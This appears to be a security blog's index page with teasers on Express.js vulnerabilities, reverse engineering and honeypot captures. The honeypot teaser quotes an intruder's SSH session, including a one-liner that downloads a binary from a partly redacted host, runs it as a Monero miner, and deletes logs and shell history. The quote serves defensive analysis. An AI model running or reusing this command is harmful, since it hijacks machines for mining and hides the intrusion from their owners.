Some Background Nowadays, a lot of people are leaning towards replacing the typical LAMP/LEMP stack with something more modern. Particuluarly, many people are leaning towards adopting Node.js. While I love that people are adopting new technology and moving away from shudders PHP, there is reasonable skepticism when choosing new technologies because we don’t want vulnerabilities. So What’s The Problem With Express? Express is a great library. It has plenty of features, it makes doing practically anything a dead simple task, all while staying reasonably simplistic in design. Read more ...

So, I’ve been gone a while. I haven’t posted here in 2~ months since I did my first writeup, but I’ve been doing some reverse engineering work lately and have lots of neat finds to share (particularly related to fun MMO hacking). Stay tuned! Read more ...

It seems overnight I have gotten two honeypot bites, both from SMA (suckmyass) variants that I expected to be dead. Let’s see what they did, shall we? 138.36.██.██ connects with SSH-2.0-PuTTY_Release_0.70, user SSH2 and password Hacked12123. ls ls -a uname -a cat /proc/cpuinfo wget http://167.88.███.██/m -O - > /etc/.0; chmod 777 /etc/.0; /etc/.0 -u 42bWPQ... -o pool.monero.hashvault.pro:5555 -p x -k -a cryptonight -B --donate-level=1 --max-cpu-usage=98; rm -rf nohup.out /var/log/lastlog; history -c *I truncated that monero address, since it serves no purpose but to take up space. Read more ...